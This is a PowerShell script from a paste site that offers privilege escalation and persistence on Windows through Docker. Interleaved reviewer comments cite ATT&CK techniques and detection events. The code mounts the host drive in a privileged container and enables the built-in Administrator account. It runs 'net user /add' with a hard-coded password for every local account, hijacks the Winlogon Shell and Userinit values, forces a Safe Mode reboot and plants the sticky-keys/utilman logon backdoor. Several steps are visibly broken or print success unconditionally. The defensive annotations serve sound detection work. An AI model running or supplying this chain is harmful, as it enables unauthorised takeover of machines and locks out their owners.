WhosYourDaddySec

SystemOverride.ps1

Feb 7th, 2025
  1. <#
  2. .SYNOPSIS
  3. One day, I was in a bit of a bind, system locked down, no way in, passwords not set by me, and the machine wouldn't budge. But you know me, always ready with a backup plan. So, I wrote this PowerShell script, using Docker and a few crafty tricks to give myself permanent root access. Now I can always get in, no matter what goes wrong. This is for emergency use only. Don’t go fucking up anyone else's system with this. As tempting as it may be.
  4. #>
  5.  
  # Check-NonRoot: stops the script when the caller already holds the built-in
  # Administrators role. Takes no parameters and returns nothing.
  # The check reads the current process identity (WindowsIdentity.GetCurrent) and
  # asks WindowsPrincipal.IsInRole; "root" in the message means Windows Administrator.
  # Reviewer note (defence): everything after this call is written to be launched
  # from a non-administrator session, so that is the context to hunt for it in.
  6. function Check-NonRoot {
  7. $user = [System.Security.Principal.WindowsIdentity]::GetCurrent()
  8. $isAdmin = [System.Security.Principal.WindowsPrincipal]::new($user).IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)
  9.  
  10. if ($isAdmin) {
  11. Write-Host "Yo, no need for this script if you're root already. Exit out!" -ForegroundColor Red
  # `exit` ends the whole script here, not just this function.
  12. exit
  13. }
  14. }
  15.  
  16. Check-NonRoot
  17.  
  # Check-Docker: precondition check. Exits unless a `docker` command resolves,
  # then makes sure the Windows service named "com.docker.service" is Running,
  # attempting one Start-Service and a fixed 5-second wait if it is not.
  # Takes no parameters and returns nothing; every failure path calls `exit`.
  # Reviewer note (defence): the script depends entirely on an unprivileged user
  # being allowed to drive the Docker daemon. Treat that permission as
  # administrator-equivalent and grant it as sparingly as local admin rights.
  18. function Check-Docker {
  19. if (-not (Get-Command docker -ErrorAction SilentlyContinue)) {
  20. Write-Host "Docker is not installed. Install Docker before running this script." -ForegroundColor Red
  21. exit
  22. }
  23.  
  24. $dockerService = Get-Service -Name "com.docker.service" -ErrorAction SilentlyContinue
  # $null means the service is not registered at all; both cases fall into the start attempt.
  25. if ($null -eq $dockerService -or $dockerService.Status -ne 'Running') {
  26. Write-Host "Docker isn’t running. Starting Docker for you..." -ForegroundColor Yellow
  27. Start-Service -Name "com.docker.service"
  28. Start-Sleep -Seconds 5
  # Re-read the status once after the wait; there is no retry loop.
  29. $dockerService = Get-Service -Name "com.docker.service"
  30. if ($dockerService.Status -ne 'Running') {
  31. Write-Host "Docker still won’t start. You’ll need to fix that manually." -ForegroundColor Red
  32. exit
  33. }
  34. Write-Host "Docker’s up and running. Let’s roll!" -ForegroundColor Green
  35. }
  36. }
  37.  
  38. Check-Docker
  39.  
  # Docker-Mount: runs an interactive (-it), privileged container from an image
  # called `windows`, bind-mounting the host C:\ drive at /mnt, and asks /bin/sh
  # inside it to run cmd.exe. --rm removes the container when that session ends.
  # Takes no parameters; the docker exit status is not checked.
  # Reviewer note (defence): this is the step that tries to turn Docker access
  # into host file-system access. Alert on docker command lines that combine
  # --privileged with a bind mount of a drive root (process-creation logging,
  # e.g. Security event 4688 or Sysmon event 1, with command-line capture).
  40. function Docker-Mount {
  41. Write-Host "[+] Mounting system files via Docker..." -ForegroundColor Green
  42. docker run --rm -it --privileged -v C:\:/mnt windows /bin/sh -c "cmd.exe"
  43. }
  44.  
  45. Docker-Mount
  46.  
  # Enable-AdminAccount: issues `net user Administrator /active:yes` through
  # `docker exec` against a container referred to as `windows`.
  # Takes no parameters; the success line is printed unconditionally, so the
  # output does not show whether any account state actually changed.
  # Reviewer note (defence): re-enabling the built-in Administrator account is
  # account manipulation (ATT&CK T1098). Security event 4722 ("a user account was
  # enabled") for the built-in Administrator account is the signal to alert on;
  # verify the real account state on the host rather than trusting this output.
  47. function Enable-AdminAccount {
  48. Write-Host "[+] Enabling hidden Administrator account..." -ForegroundColor Green
  49. docker exec -it windows net user Administrator /active:yes
  50. Write-Host "[+] Administrator account enabled. You now have the keys to the kingdom!" -ForegroundColor Green
  51. }
  52.  
  53. Enable-AdminAccount
  54.  
  # Reset-UserPassword: lists local accounts on the machine running the script
  # (Win32_UserAccount where LocalAccount is true) and, for each name, runs
  # `net user <name> "GhostSec123!" /add` through `docker exec`.
  # Takes no parameters; the per-user message is printed whatever net user returns.
  # Reviewer note (defence): the password is a fixed literal, so it appears in the
  # script text and in every captured command line and is usable as a hunting
  # string. Related Security events: 4720 (account created), 4724 (password reset
  # attempt), 4738 (account changed). If the string is found in an environment,
  # treat every local account as compromised and rotate credentials.
  55. function Reset-UserPassword {
  56. Write-Host "[+] Resetting user passwords to 'GhostSec123!'" -ForegroundColor Green
  # Enumeration happens in the calling PowerShell session, not inside the container.
  57. $users = Get-WmiObject Win32_UserAccount | Where-Object { $_.LocalAccount -eq $true }
  58. foreach ($user in $users) {
  59. docker exec -it windows net user $user.Name "GhostSec123!" /add
  60. Write-Host "[+] Password reset for: $($user.Name). You’re good to go." -ForegroundColor Cyan
  61. }
  62. }
  63.  
  64. Reset-UserPassword
  65.  
  # Grant-RootAccess: writes three registry values with `reg add ... /f` through
  # `docker exec`: Winlogon\Userinit = "C:\Windows\system32\userinit.exe,",
  # Winlogon\Shell = "explorer.exe", and Policies\System\EnableLUA = 1.
  # Takes no parameters; the closing message is printed unconditionally.
  # NOTE(review): these look like the stock Windows values for all three entries
  # (EnableLUA = 1 leaves UAC on), so nothing visible here grants any access
  # despite the message. Confirm against a clean baseline.
  # Reviewer note (defence): the values are still worth recording, because they
  # are what Winlogon\Shell and Winlogon\Userinit should be restored to after the
  # later Modify-Registry step overwrites them.
  66. function Grant-RootAccess {
  67. Write-Host "[+] Granting permanent root access..." -ForegroundColor Green
  68. docker exec -it windows reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe," /f
  69. docker exec -it windows reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "explorer.exe" /f
  70. docker exec -it windows reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 1 /f
  71. Write-Host "[+] Root access granted. You’re in control now." -ForegroundColor Green
  72. }
  73.  
  74. Grant-RootAccess
  75.  
  # Modify-Registry: overwrites Winlogon\Shell with "cmd.exe" and Winlogon\Userinit
  # with "C:\Windows\system32\userinit.exe,cmd.exe" using `reg add ... /f` through
  # `docker exec`. Takes no parameters; the closing message is unconditional.
  # Reviewer note (defence): changing Winlogon Shell/Userinit is logon-time
  # persistence (ATT&CK T1547.004). Monitor writes to both values (Sysmon event 13,
  # or Security event 4657 with registry auditing enabled) and alert on any data
  # other than the baseline. A replaced Shell also leaves users without a desktop,
  # so help-desk reports of "only a command prompt after login" are a lead.
  76. function Modify-Registry {
  77. Write-Host "[+] Modifying registry for CMD at login screen..." -ForegroundColor Green
  78. docker exec -it windows reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "cmd.exe" /f
  79. docker exec -it windows reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,cmd.exe" /f
  80. Write-Host "[+] Registry updated to always launch CMD. You’re now the system overlord." -ForegroundColor Green
  81. }
  82.  
  83. Modify-Registry
  84.  
  # Enable-SafeMode: requests `bcdedit /set {current} safeboot network` through
  # `docker exec`, then calls Restart-Computer -Force from the calling session.
  # Takes no parameters. The restart is the one state-changing call in this script
  # that is issued directly on the host rather than through docker.
  # Reviewer note (defence): forcing a Safe Mode boot is a defence-evasion
  # technique (ATT&CK T1562.009), since security tooling may not be loaded in Safe
  # Mode. Alert on bcdedit command lines containing `safeboot`. To clear a safeboot
  # flag found on a host: `bcdedit /deletevalue {current} safeboot`.
  85. function Enable-SafeMode {
  86. Write-Host "[+] Enabling Safe Mode with Networking..." -ForegroundColor Green
  87. docker exec -it windows bcdedit /set {current} safeboot network
  88. Write-Host "[+] Safe Mode enabled. System will boot into Safe Mode on the next restart." -ForegroundColor Cyan
  # -Force restarts without waiting for logged-on users; unsaved work is lost.
  89. Restart-Computer -Force
  90. }
  91.  
  92. Enable-SafeMode
  93.  
  # Enable-CMD: sets a Debugger value of "cmd.exe" under the Image File Execution
  # Options keys for utilman.exe and sethc.exe, using `reg add ... /f` through
  # `docker exec`. Takes no parameters; the closing message is unconditional.
  # Reviewer note (defence): this is the accessibility-features logon-screen
  # backdoor (ATT&CK T1546.008). Detection: any Debugger value under IFEO for
  # sethc.exe, utilman.exe or the other accessibility binaries (Sysmon event 13 /
  # Security event 4657), and cmd.exe running as a child of winlogon.exe.
  # Remediation: delete the Debugger values and review who could write to HKLM.
  94. function Enable-CMD {
  95. Write-Host "[+] Enabling CMD at login screen..." -ForegroundColor Green
  96. docker exec -it windows reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "cmd.exe" /f
  97. docker exec -it windows reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "cmd.exe" /f
  98. Write-Host "[+] CMD is now accessible from the login screen. Just hit SHIFT five times!" -ForegroundColor Cyan
  99. }
  100.  
  101. Enable-CMD
  102.  
  # Final status line. It is printed unconditionally: no earlier step checks an
  # exit code, so this message is not evidence that any change took effect.
  # Reviewer note (defence): the literal password shown here also ends up in
  # console transcripts and script-block logs, where it can be searched for.
  103. Write-Host "[+] Everything’s done. The system’s now under your control. Reboot and you should be able to log in with 'GhostSec123!' or access via CMD. Enjoy the power, and don’t be a piece of shit." -ForegroundColor Cyan